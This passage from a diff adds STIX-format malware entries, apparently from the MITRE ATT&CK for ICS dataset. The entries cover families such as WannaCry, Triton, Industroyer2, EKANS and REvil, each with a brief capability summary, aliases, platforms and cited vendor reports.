"2019-04-16T19:00:49.435Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": 
"mitre-attack", + "url": "https://attack.mitre.org/software/S0372", + "external_id": "S0372" + }, + { + "source_name": "CarbonBlack LockerGoga 2019", + "description": "CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019.", + "url": "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/" + }, + { + "source_name": "Unit42 LockerGoga 2019", + "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.", + "url": "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-12T18:30:51.174Z", + "name": "VPNFilter", + "description": "[VPNFilter](https://attack.mitre.org/software/S1010) is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations. [VPNFilter](https://attack.mitre.org/software/S1010) modules such as its packet sniffer ('ps') can collect traffic that passes through an infected device, allowing the theft of website credentials and monitoring of Modbus SCADA protocols. 
(Citation: William Largent June 2018) (Citation: Carl Hurd March 2019)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "VPNFilter" + ], + "type": "malware", + "id": "malware--6108f800-10b8-4090-944e-be579f01263d", + "created": "2019-03-26T15:02:14.907Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1010", + "external_id": "S1010" + }, + { + "source_name": "Carl Hurd March 2019", + "description": "Carl Hurd 2019, March 26 VPNFilter Deep Dive Retrieved. 2019/03/28 ", + "url": "https://www.youtube.com/watch?v=yuZazP22rpI" + }, + { + "source_name": "William Largent June 2018", + "description": "William Largent 2018, June 06 VPNFilter Update - VPNFilter exploits endpoints, targets new devices Retrieved. 2019/03/28 ", + "url": "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:17:50.971Z", + "name": "Duqu", + "description": "[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. 
(Citation: Symantec W32.Duqu)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "Duqu" + ], + "type": "malware", + "id": "malware--68dca94f-c11d-421e-9287-7c501108e18c", + "created": "2017-05-31T21:32:31.188Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0038", + "external_id": "S0038" + }, + { + "source_name": "Symantec W32.Duqu", + "description": "Symantec Security Response. (2011, November). W32.Duqu: The precursor to the next Stuxnet. Retrieved September 17, 2015.", + "url": "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-06T22:00:22.774Z", + "name": "Industroyer2", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://attack.mitre.org/software/S0604). Security researchers assess that [Industroyer2](https://attack.mitre.org/software/S1072) was designed to cause impact to high-voltage electrical substations. 
The initial [Industroyer2](https://attack.mitre.org/software/S1072) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.(Citation: Industroyer2 Blackhat ESET)", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Engineering Workstation" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Industroyer2" + ], + "type": "malware", + "id": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "created": "2023-03-30T19:20:45.556Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1072", + "external_id": "S1072" + }, + { + "source_name": "Industroyer2 Blackhat ESET", + "description": "Anton Cherepanov, Robert Lipovsky. (2022, August). Industroyer2: Sandworm's Cyberwarfare Targets Ukraine's Power Grid. Retrieved April 6, 2023.", + "url": "https://www.youtube.com/watch?v=xC9iM5wVedQ" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Killdisk" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Killdisk", + "description": "In 2015 the BlackEnergy malware contained a component called KillDisk. KillDisk's main functionality is to overwrite files with random data, rendering the OS unbootable. 
(Citation: ESET BlackEnergy Jan 2016)", + "id": "malware--736a3b71-eccc-48b7-b5ed-adb2b74ca830", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31T21:33:21.973Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1005", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0016" + }, + { + "source_name": "ESET BlackEnergy Jan 2016", + "description": "Anton Cherepanov. (n.d.). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved October 29, 2019.", + "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + }, + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton. (n.d.). When The Lights Went Out. Retrieved October 22, 2019.", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "modified": "2023-03-08T22:20:20.868Z", + "name": "WannaCry", + "description": "[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. 
It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Jan Miller, CrowdStrike" + ], + "x_mitre_aliases": [ + "WannaCry", + "WanaCry", + "WanaCrypt", + "WanaCrypt0r", + "WCry" + ], + "type": "malware", + "id": "malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", + "created": "2019-03-25T17:30:17.004Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0366", + "external_id": "S0366" + }, + { + "source_name": "WanaCrypt0r", + "description": "(Citation: LogRhythm WannaCry)" + }, + { + "source_name": "WCry", + "description": "(Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis)" + }, + { + "source_name": "WanaCry", + "description": "(Citation: SecureWorks WannaCry Analysis)" + }, + { + "source_name": "WanaCrypt", + "description": "(Citation: SecureWorks WannaCry Analysis)" + }, + { + "source_name": "FireEye WannaCry 2017", + "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html" + }, + { + "source_name": "SecureWorks WannaCry Analysis", + "description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.", + "url": "https://www.secureworks.com/research/wcry-ransomware-analysis" + }, + { + "source_name": "Washington Post WannaCry 2017", + "description": "Dwoskin, E. and Adam, K. (2017, May 14). 
More than 150 countries affected by massive cyberattack, Europol says. Retrieved March 25, 2019.", + "url": "https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4" + }, + { + "source_name": "LogRhythm WannaCry", + "description": "Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.", + "url": "https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/" + }, + { + "source_name": "US-CERT WannaCry 2017", + "description": "US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-132A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-11-23T14:27:54.711Z", + "name": "Triton", + "description": "[Triton](https://attack.mitre.org/software/S1009) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers.(Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017)(Citation: Dragos December 2017)(Citation: DHS CISA February 2019)(Citation: Schneider Electric January 2018)(Citation: Julian Gutmanis March 2019)(Citation: Schneider December 2018)(Citation: Jos Wetzels January 2018)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Triton", + "TRISIS", + "HatMan" + ], + "type": "malware", + "id": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "created": "2019-03-26T15:02:14.907Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1009", + "external_id": "S1009" + }, + { + "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017", + "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" + }, + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + }, + { + "source_name": "Dragos December 2017", + "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ", + "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf" + }, + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + }, + { + "source_name": "Julian Gutmanis March 2019", + "description": "Julian Gutmanis 2019, March 11 Triton - A Report From The Trenches Retrieved. 2019/03/11 ", + "url": "https://www.youtube.com/watch?v=XwSJ8hloGvY" + }, + { + "source_name": "Schneider December 2018", + "description": "Schneider 2018, December 14 Security Notification EcoStruxure Triconex Tricon V3 Retrieved. 
2019/03/08 ", + "url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet&p_File_Name=SEVD-2017-347-01+Triconex+V3.pdf&p_Doc_Ref=SEVD-2017-347-01" + }, + { + "source_name": "Schneider Electric January 2018", + "description": "Schneider Electric 2018, January 23 TRITON - Schneider Electric Analysis and Disclosure Retrieved. 2019/03/14 ", + "url": "https://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0s" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "BlackEnergy 3" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "BlackEnergy 3", + "description": "[BlackEnergy 3](https://collaborate.mitre.org/attackics/index.php/Software/S0004) is a malware toolkit that has been used by both criminal and APT actors. It support various plug-ins including a variant of KillDisk. It is known to have been used against the Ukrainian power grid. (Citation: Booz Allen Hamilton)", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--89ab0ca5-f7e0-4d16-bf2a-17d68117fa4b", + "created": "2017-05-31T21:32:59.661Z", + "modified": "2021-04-29T14:49:39.188Z", + "external_references": [ + { + "external_id": "S1002", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0004" + }, + { + "description": "Booz Allen Hamilton. (n.d.). When The Lights Went Out. 
Retrieved October 22, 2019.", + "source_name": "Booz Allen Hamilton", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "EKANS", + "SNAKEHOSE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_version": "1.0", + "type": "malware", + "modified": "2021-10-21T14:00:00.188Z", + "created": "2021-04-13T12:28:31.188Z", + "description": "[EKANS](https://collaborate.mitre.org/attackics/index.php/Software/S0017) is ransomware that was first seen December 2019 and later reported to have impacted operations at Honda automotive production facilities.(Citation: Forbes Snake Ransomware June 2020)(Citation: MalwareByes Honda and Enel Ransomware June 2020)(Citation: Dragos EKANS February 2020) EKANS has a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy historian, Honeywell HMIWeb).(Citation: Dragos EKANS February 2020) If the malware discovers these processes on the target system, it will stop, encrypt, and rename the process to prevent the program from restarting. This malware should not be confused with the “Snake” malware associated with the Turla group. 
The ICS processes documented within the malware’s kill-list is similar to those defined by the MEGACORTEX software.(Citation: FireEye OT Ransomware July 2020)(Citation: Pylos January 2020)(Citation: Dragos EKANS June 2020)The ransomware was initially reported as “Snake”, however, to avoid confusion with the unrelated Turla APT group security researchers spelled it backwards as EKANS.", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "external_id": "S0017", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0017" + }, + { + "source_name": "Forbes Snake Ransomware June 2020", + "description": "Davey Winder. (2020, June 10). Honda Hacked: Japanese Car Giant Confirms Cyber Attack On Global Operations. Retrieved April 12, 2021.", + "url": "https://www.forbes.com/sites/daveywinder/2020/06/10/honda-hacked-japanese-car-giant-confirms-cyber-attack-on-global-operations-snake-ransomware/?sh=2725c35753ad" + }, + { + "source_name": "MalwareByes Honda and Enel Ransomware June 2020", + "description": "MalwareBytes. (2020, June 09). Honda and Enel impacted by cyber attack suspected to be ransomware. Retrieved April 12, 2021.", + "url": "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/" + }, + { + "source_name": "Dragos EKANS February 2020", + "description": "Dragos Threat Intelligence. (2020, February 03). EKANS Ransomware and ICS Operations. Retrieved April 12, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + }, + { + "source_name": "FireEye OT Ransomware July 2020", + "description": "Nathan Brubaker, Daniel Kapellmann Zafra, Keith Lunden, Ken Proska, Corey Hildebrandt. (2020, July 15). Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families. 
Retrieved April 12, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html" + }, + { + "source_name": "Pylos January 2020", + "description": "Joe Slowik. (2020, January 28). Getting the Story Right, and Why It Matters. Retrieved April 12, 2021.", + "url": "https://pylos.co/2020/01/28/getting-the-story-right-and-why-it-matters/" + }, + { + "source_name": "Dragos EKANS June 2020", + "description": "Joe Slowik. (2020, June 18). EKANS Ransomware Misconceptions and Misunderstandings. Retrieved April 12, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/#_edn7" + } + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--9e3c9495-5fbd-4676-b3ac-ddecceb57b8f", + "name": "EKANS", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_contributors": [ + "The DFIR Report, @TheDFIRReport", + "Matt Brenton, Zurich Insurance Group" + ], + "x_mitre_aliases": [ + "Ryuk" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "created": "2020-05-13T20:14:53.171Z", + "x_mitre_version": "1.3", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0446", + "url": "https://attack.mitre.org/software/S0446" + }, + { + "source_name": "Ryuk", + "description": "(Citation: CrowdStrike Ryuk January 2019) (Citation: Bleeping Computer - Ryuk WoL) " + }, + { + "source_name": "Bleeping Computer - Ryuk WoL", + "url": 
"https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/", + "description": "Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021." + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020." + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020." + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. 
[Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)", + "modified": "2022-05-24T21:10:44.381Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Ryuk", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-12T17:15:44.068Z", + "name": "ACAD/Medre.A", + "description": "[ACAD/Medre.A](https://attack.mitre.org/software/S1000) is a worm that steals operational information. The worm collects AutoCAD files with drawings. [ACAD/Medre.A](https://attack.mitre.org/software/S1000) has the capability to be used for industrial espionage.(Citation: ESET)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "ACAD/Medre.A" + ], + "type": "malware", + "id": "malware--a4a98eab-b691-45d9-8c48-869ef8fefd57", + "created": "2017-05-31T21:32:59.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1000", + "external_id": "S1000" + }, + { + "source_name": "ESET", + "description": "ESET ACAD/Medre.A: 10000s of AutoCAD Designs Leaked in Suspected Industrial Espionage Retrieved. 
2021/04/13 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/ESET_ACAD_Medre_A_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-26T20:06:33.317Z", + "name": "REvil", + "description": "[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496), which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Edward Millington" + ], + "x_mitre_aliases": [ + "REvil", + "Sodin", + "Sodinokibi" + ], + "type": "malware", + "id": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "created": "2020-08-04T15:06:14.796Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0496", + "external_id": "S0496" + }, + { + "source_name": "Sodin", + "description": "(Citation: Intel 471 REvil March 2020)(Citation: Kaspersky Sodin July 2019)" + }, + { + "source_name": "Sodinokibi", + "description": "(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: G Data Sodinokibi June 
2019)(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee REvil October 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)(Citation: Tetra Defense Sodinokibi March 2020)" + }, + { + "source_name": "Talos Sodinokibi April 2019", + "description": "Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.", + "url": "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html" + }, + { + "source_name": "Secureworks REvil September 2019", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware" + }, + { + "source_name": "Cylance Sodinokibi July 2019", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html" + }, + { + "source_name": "Group IB Ransomware May 2020", + "description": "Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020.", + "url": "https://www.group-ib.com/whitepapers/ransomware-uncovered.html" + }, + { + "source_name": "G Data Sodinokibi June 2019", + "description": "Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020.", + "url": "https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data" + }, + { + "source_name": "Intel 471 REvil March 2020", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. 
Retrieved August 4, 2020.", + "url": "https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/" + }, + { + "source_name": "Kaspersky Sodin July 2019", + "description": "Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.", + "url": "https://securelist.com/sodin-ransomware/91473/" + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/" + }, + { + "source_name": "Picus Sodinokibi January 2020", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware" + }, + { + "source_name": "McAfee REvil October 2019", + "description": "Saavedra-Morales, J, et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Crescendo. Retrieved August 5, 2020.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/" + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection" + }, + { + "source_name": "Tetra Defense Sodinokibi March 2020", + "description": "Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. 
Retrieved December 14, 2020.", + "url": "https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-17T16:23:24.812Z", + "name": "INCONTROLLER", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) is custom malware that includes multiple modules tailored towards ICS devices and technologies, including Schneider Electric and Omron PLCs as well as OPC UA, Modbus, and CODESYS protocols. [INCONTROLLER](https://attack.mitre.org/software/S1045) has the ability to discover specific devices, download logic on the devices, and exploit platform-specific vulnerabilities. As of September 2022, some security researchers assessed [INCONTROLLER](https://attack.mitre.org/software/S1045) was developed by CHERNOVITE.(Citation: CISA-AA22-103A)(Citation: Brubaker-Incontroller)(Citation: Dragos-Pipedream)(Citation: Schneider-Incontroller)(Citation: Wylie-22) ", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Engineering Workstation", + "Windows" + ], + "x_mitre_deprecated": false, + 